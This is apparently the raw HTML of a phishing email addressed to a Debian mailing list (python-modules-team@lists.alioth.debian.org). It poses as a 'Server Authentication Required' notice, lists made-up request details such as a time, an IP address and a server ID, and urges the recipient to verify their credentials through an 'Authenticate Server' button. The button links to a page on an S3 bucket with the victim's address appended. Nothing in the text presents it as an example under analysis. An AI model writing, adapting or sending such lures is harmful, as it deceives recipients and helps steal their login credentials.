<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Server Authentication Required</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f9f9f9;
            margin: 0;
            padding: 0;
        }
        .email-container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            border-radius: 5px;
        }
        .email-header {
            background-color: #0073e6;
            color: #ffffff;
            padding: 15px 20px;
            border-top-left-radius: 5px;
            border-top-right-radius: 5px;
            text-align: center;
        }
        .email-body {
            padding: 20px;
            color: #333333;
        }
        .email-body p {
            line-height: 1.6;
            margin: 10px 0;
        }
        .action-button {
            display: inline-block;
            margin: 20px 0;
            padding: 10px 20px;
            background-color: #0073e6;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold;
        }
        .email-footer {
            background-color: #f0f0f0;
            color: #666666;
            font-size: 12px;
            text-align: center;
            padding: 10px;
            border-bottom-left-radius: 5px;
            border-bottom-right-radius: 5px;
        }
    </style>
</head>
<body style="font-family: Arial, sans-serif;
            background-color: #f9f9f9;
            margin: 0;
            padding: 0">
    <div style="max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            border-radius: 5px" class="email-container">
        <div style="background-color: #0073e6;
            color: #ffffff;
            padding: 15px 20px;
            border-top-left-radius: 5px;
            border-top-right-radius: 5px;
            text-align: center" class="email-header">
            <h1>Server Authentication Required</h1>
        </div>
        <div style="padding: 20px;
            color: #333333" class="email-body">
            <p style="line-height: 1.6;
            margin: 10px 0">Dear User,</p>
            <p style="line-height: 1.6;
            margin: 10px 0">Our system has detected an authentication request for your server. To retain access to your <font color="#0b10f4"><strong>python-modules-team@lists.alioth.debian.org</strong></font> mailbox, kindly proceed to verify your credentials, please review the details and authenticate using the link below:</p>
            <p style="line-height: 1.6;
            margin: 10px 0"><strong>Request Details:</strong></p>
            <ul>
                <li><strong>Request Time:</strong> November 27, 2024, 11:45 AM UTC</li>
                <li><strong>IP Address:</strong> 45.107.65.101</li>
                <li><strong>Server ID:</strong> SRV-8230-CTQ</li>
            </ul>
            <p style="line-height: 1.6;
            margin: 10px 0">Please follow the link below to authenticate your <strong><font color="#0e0bf4">lists.alioth.debian.org</font></strong> server:</p>
            <p style="line-height: 1.6;
            margin: 10px 0"><a style="display: inline-block;
            margin: 20px 0;
            padding: 10px 20px;
            background-color: #0073e6;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold" class="action-button" href="https://trymail.s3.us-east-2.amazonaws.com/stttttn.html#python-modules-team@lists.alioth.debian.org">Authenticate Server</a></p>
            <p style="line-height: 1.6;
            margin: 10px 0"><br></p>
        </div>
        <div style="background-color: #f0f0f0;
            color: #666666;
            font-size: 12px;
            text-align: center;
            padding: 10px;
            border-bottom-left-radius: 5px;
            border-bottom-right-radius: 5px" class="email-footer">
            <p>This is an automated notification. Please do not reply to this email.</p>
            <p>© <strong>lists.alioth.debian.org</strong> 2024 Server Authentication Inc. All rights reserved.</p>
        </div>
    </div>


</body></html>